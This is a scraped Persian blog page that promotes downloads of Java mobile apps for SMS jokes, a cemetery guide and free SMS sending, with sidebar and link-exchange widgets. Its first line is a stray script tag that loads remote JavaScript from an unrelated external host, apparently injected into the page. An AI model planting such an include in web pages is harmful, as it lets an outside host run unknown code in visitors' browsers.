script type="text/javascript" src="http://7vps.ir/img/website.js"> نرم افزار موتورولا
کافی نت
وبلاگی جذاب

 

دانلود نرم افزار جاوا پیامک لاتین

نوشته شده توسط Hamid-Hira در تاریخ شنبه، 23 بهمن ماه 1389
latin-sms-hamidhira.jpg
امروزه پیامک ها نقش مهمی را در ارتباطات ایفا میکنند . یکی از استفاده هایی که از این سرویس محبوب می شود فرستادن جک و اس ام اس های طنز است . مطمئنا شما نیز تا کنون چند باری به جستجوی جدیدترین پیامک ها پرداخته اید و حتی چندین نرم افزار بانک اس ام اس برای موبایل ساخته شده است . امروز شما را با نرم افزار بسیار جالبی آشنا خواهیم کرد که علاوه بر در برداشتن جدیدترین اس ام اس ها چندین ویژگی بسیار قابل توجه نیز دارد . یکی از این ویژگی ها لاتین بودن متن اس ام اس هاست . مطمئنا پیامک های لاتین (فینگلیش) هم برای خود طرفداران پروپاقرصی دارد . ویژگی دوم و مهم این نرم افزار امکان ارسال اس ام اس های داخل برنامه بدون نیاز به تایپ آن ها می باشد و سازگاری برنامه با گوشی های لمسی نیز از دیگر ویژگی های مهم این نرم افزار جاوا می باشد.
برای دریافت این برنامه به ادامه مطلب مراجعه کنید .
ادامه مطلب+Download

 

نرم افزار جاوا بهشت زهرا

نوشته شده توسط Hamid-Hira در تاریخ پنجشنبه، 7 بهمن ماه 1389
hamidhira-beheshtzahra-jar.jpg

به تازگی نرم افزاری ویژه تلفن همراه با عنوان "سازمان بهشت زهرا (س)" تولید و منتشر شده است . این نرم افزار شامل بخش های مختلفی از جمله معرفی سازمان بهشت زهرا، جستجوی متوفی، نقشه بهشت زهرا با امکان مسیریابی، ادعیه و احکام، معرفی قطعات و برخی از شهدای شاخص و امکانات دیگر است. این نرم افزار به صورت جاوا طراحی شده و از این رو بر روی تمامی موبایل ها قابل نصب خواهد بود.
از مهم ترین ویژگی های فنی این نرم افزار می توان به جستجوی سریع متوفی و نمایش محل دفن آن بر روی نقشه، امکان انتخاب مبدا و مقصد ونمایش مسیر بر روی نقشه، امکان اجرا بر روی گوشی های لمسی (Touch Screen)، امکان اجرا بر روی گوشی های فاقد امکانات فارسی و نمایش تمام صفحه در گوشی های مختلف اشاره کرد
ادامه مطلب+Download

نرم افزار جاوا ارسال پیامک رایگان

نوشته شده توسط Hamid-Hira در تاریخ چهارشنبه، 6 بهمن ماه 1389
sms-rayegan-hamidhira.jpg

امروزه یکی از مهمترین راه های ارتباطی پیامک ها محسوب میشوند . پیام کوتاه کم کم به عادت اکثر مردم تبدیل شده است به طوری که حتی تبریک گفتن ها و ... هم از طریق ارسال پیام کوتاه انجام میشود .
سالانه در کشور ملیون ها پیامک ارسال میشود که این نشان از محبوبیت و استفاده ی بالا از این سرویس دارد . اگر شما هم از طرفداران پیام کوتاه و یا به اصطلاح اس ام اس باز باشید حتما با هزینه های ارسال پیامک آشنایی دارید . اما آیا تا به حال به این فکر کرده اید که روزی بتوانید برای ارسال هر پیامک هزینه ای بسیار ناچیز پرداخت کنید ؟ به قدری اندک که بتوان آن را رایگان نامید ؟
نرم افزار های زیادی برای کاهش هزینه ی اس ام اس وجود دارد که اکثرا یا غیر قابل استفاده هستند و یا کار با آنها اذیت کننده است . امروز در سایت میهن دانلود نرم افزاری را خدمت شما معرفی خواهیم کرد که با یک ایده ی جالب باعث رایگان شدن ارسال پیامک های شما خواهد شد . این نرم افزار که با استفاده از سرویس GPRS پیام کوتاه های شما را ارسال خواهد کرد به صورت جاوا (قابل نصب بر روی تمام گوشی ها) و با ظاهری ساده و کاربرپسند طراحی شده است .

برای دریافت برنامه ، توضیحات بیشتر و آموزش استفاده به ادامه مطلب مراجعه کنید
ادامه مطلب+Download





ادامه مطلب ...


صفحه قبل 1 صفحه بعد

درباره وبلاگ


به وبلاگ خودتان خوش آمدید امیدوارم که در این وبلاگ بتوانم نیاز شما دوست گرامی را برآورده سازم.
آخرین مطالب
آرشيو وبلاگ
نويسندگان
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان کافی نت و آدرس caffinet.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.








نام :
وب :
پیام :
2+2=:
(Refresh)

<-PollName->

<-PollItems->

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز :
بازدید دیروز :
بازدید هفته :
بازدید ماه :
بازدید کل :
تعداد مطالب : 562
تعداد نظرات : 8
تعداد آنلاین : 1


Alternative content


آریان پیامک
آریان اس ام اس